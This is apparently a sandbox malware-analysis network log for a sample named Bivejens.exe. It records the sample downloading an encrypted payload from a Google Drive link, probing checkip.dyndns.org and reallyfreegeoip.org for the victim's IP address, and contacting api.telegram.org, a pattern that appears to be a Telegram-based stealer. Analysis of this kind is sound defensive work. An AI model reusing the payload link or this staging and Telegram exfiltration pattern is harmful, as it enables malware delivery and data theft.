                                                                                                                        Jan 11, 2025 00:41:30.913075924 CET44349987149.154.167.220192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:30.913177013 CET49987443192.168.2.10149.154.167.220
                                                                                                                        Jan 11, 2025 00:41:30.919373989 CET49987443192.168.2.10149.154.167.220
                                                                                                                        Jan 11, 2025 00:41:37.076623917 CET4993780192.168.2.10132.226.247.73
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 11, 2025 00:41:12.829164982 CET5565453192.168.2.101.1.1.1
                                                                                                                        Jan 11, 2025 00:41:12.835983992 CET53556541.1.1.1192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.975204945 CET5179553192.168.2.101.1.1.1
                                                                                                                        Jan 11, 2025 00:41:13.986037016 CET53517951.1.1.1192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.952950954 CET5663253192.168.2.101.1.1.1
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET53566321.1.1.1192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:19.212218046 CET5319553192.168.2.101.1.1.1
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET53531951.1.1.1192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:30.048609972 CET5207553192.168.2.101.1.1.1
                                                                                                                        Jan 11, 2025 00:41:30.056694031 CET53520751.1.1.1192.168.2.10
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Jan 11, 2025 00:41:12.829164982 CET192.168.2.101.1.1.10xe222Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:13.975204945 CET192.168.2.101.1.1.10xb2a9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.952950954 CET192.168.2.101.1.1.10x5cb0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.212218046 CET192.168.2.101.1.1.10xafefStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:30.048609972 CET192.168.2.101.1.1.10x32b2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Jan 11, 2025 00:40:38.899571896 CET1.1.1.1192.168.2.100xfacdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:40:38.899571896 CET1.1.1.1192.168.2.100xfacdNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:12.835983992 CET1.1.1.1192.168.2.100xe222No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:13.986037016 CET1.1.1.1192.168.2.100xb2a9No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:17.961139917 CET1.1.1.1192.168.2.100x5cb0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:19.221194983 CET1.1.1.1192.168.2.100xafefNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 11, 2025 00:41:30.056694031 CET1.1.1.1192.168.2.100x32b2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                        • drive.google.com
                                                                                                                        • drive.usercontent.google.com
                                                                                                                        • reallyfreegeoip.org
                                                                                                                        • api.telegram.org
                                                                                                                        • checkip.dyndns.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.1049918132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:17.971765041 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:18.668140888 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                        Jan 11, 2025 00:41:18.671976089 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Jan 11, 2025 00:41:18.882368088 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                        Jan 11, 2025 00:41:19.847266912 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Jan 11, 2025 00:41:20.056885004 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:19 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.1049937132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:20.684493065 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Jan 11, 2025 00:41:21.355056047 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:21 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.1049948132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:21.963527918 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:22.634099007 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:22 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.1049960132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:23.287952900 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:24.006673098 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.1049968132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:24.693152905 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:25.387825012 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:25 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.1049979132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:26.016401052 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:26.718538046 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:26 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.1049983132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:27.321379900 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:27.994292974 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:27 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.1049985132.226.247.73808056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Jan 11, 2025 00:41:28.727452993 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 11, 2025 00:41:29.410079956 CET273INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:29 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.1049883142.250.181.2384438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:13 UTC216OUTGET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                        Host: drive.google.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2025-01-10 23:41:13 UTC1920INHTTP/1.1 303 See Other
                                                                                                                        Content-Type: application/binary
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:13 GMT
                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                        Content-Security-Policy: script-src 'nonce-IX_6pqAragK-wbDrYv0D9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                        Server: ESF
                                                                                                                        Content-Length: 0
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.1049890142.250.185.654438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:14 UTC258OUTGET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:17 UTC4943INHTTP/1.1 200 OK
                                                                                                                        X-GUploader-UploadID: AFIdbgQGO2Jc4ZJ-isLj8HmQ8TW8_36ZWam-MsXKt8PUCZk002W_XWSyrTSaCdTzFG40w054vEVksIA
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Disposition: attachment; filename="wzMJZbFNPJQW151.bin"
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 273984
                                                                                                                        Last-Modified: Mon, 09 Dec 2024 11:06:06 GMT
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:17 GMT
                                                                                                                        Expires: Fri, 10 Jan 2025 23:41:17 GMT
                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                        X-Goog-Hash: crc32c=reddGQ==
                                                                                                                        Server: UploadServer
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close
                                                                                                                        2025-01-10 23:41:17 UTC4943INData Raw: f2 ab 88 47 4f 6f c2 0f 1e 42 0a 02 d0 0b b2 7f 24 d9 f1 7b 04 47 97 75 63 3e a8 a7 05 7d 37 e2 5e 29 6a a0 ed 90 89 7a dd 33 d3 2e 9e 9e 6a a1 5c 68 27 49 ef 49 d7 2a 86 7d fe a0 79 7a 0c 6e c3 5d 94 57 13 08 21 70 d0 81 7d bb 37 77 19 34 1c 2b a8 42 81 34 44 40 eb 08 58 f6 58 99 96 f3 cf 3c 73 21 1f 8f 90 77 7b ed b8 61 f2 03 86 40 91 4b 12 e2 c2 5d 38 94 ae 1d 42 7c ba 53 1b 5c fe 9a 33 20 dc b4 17 50 db 94 aa cd ba c9 f2 33 cd 6e f1 6f 01 56 b3 cb 93 e2 57 36 31 e7 b8 f5 b0 6e ee 89 0d 93 69 59 3b d4 8a e5 c5 c0 d4 e3 46 68 7b 03 44 92 e5 8f 6e 0b 83 95 82 fb f3 b5 a2 b0 5b 7a 54 2a b1 c2 86 75 c4 cc 13 f3 df e4 fa 1d 44 a9 4f c6 07 3c d3 1a c7 9b a3 7b 63 7f 4c ef e4 c4 e0 d3 67 21 84 af 4e b2 2c f6 92 f0 02 8e 48 35 5b 14 79 33 10 70 18 d5 eb aa d1
                                                                                                                        Data Ascii: GOoB${Guc>}7^)jz3.j\h'II*}yzn]W!p}7w4+B4D@XX<s!w{a@K]8B|S\3 P3noVW61niY;Fh{Dn[zT*uDO<{cLg!N,H5[y3p
                                                                                                                        2025-01-10 23:41:17 UTC4810INData Raw: f6 6a 5a 25 53 9d d7 bf bd 3d 98 39 22 20 ed 05 1a 9c 05 61 57 95 3c c1 b7 4c b8 f1 3d 5c 96 06 7a 81 13 32 22 e5 ef 93 f7 03 39 59 0c 5f 16 53 3f e3 24 17 e7 8f ef 71 52 b5 50 67 15 3d e5 30 ff 88 f0 c4 9a ab 0e 3e 9a 22 a3 25 86 53 96 14 89 c3 61 15 17 26 ba 08 01 19 9f 91 1b 64 41 53 cf 67 63 31 62 6b f2 35 f6 00 e2 4e 4b 37 98 e4 3f 6c 3b 64 d5 c4 70 38 a0 45 77 c0 21 77 f9 e8 86 35 cb 4d 22 1c 04 e6 c2 89 4e 92 e7 4e 0e 15 4a e3 2f ca e6 e1 54 55 ca a3 35 01 5a ea 75 72 44 01 f7 8c eb 3c b4 d8 42 2f 69 bd 7b 94 c3 ac 8a df 8b 93 13 64 9f ba c4 d4 39 62 ed 31 e2 49 c7 90 69 bc 9a 2c 82 db 09 4c 58 39 0e 70 35 c1 f7 b8 58 9d 61 69 64 9a b6 a3 69 5b d5 15 43 55 aa 4b 03 36 7a ee ef ff 84 39 ef c9 ee 0d 3e 5d 81 f3 3e 05 f9 33 f2 ce d9 b3 fd 76 c7 8a 27
                                                                                                                        Data Ascii: jZ%S=9" aW<L=\z2"9Y_S?$qRPg=0>"%Sa&dASgc1bk5NK7?l;dp8Ew!w5M"NNJ/TU5ZurD<B/i{d9b1Ii,LX9p5Xaidi[CUK6z9>]>3v'
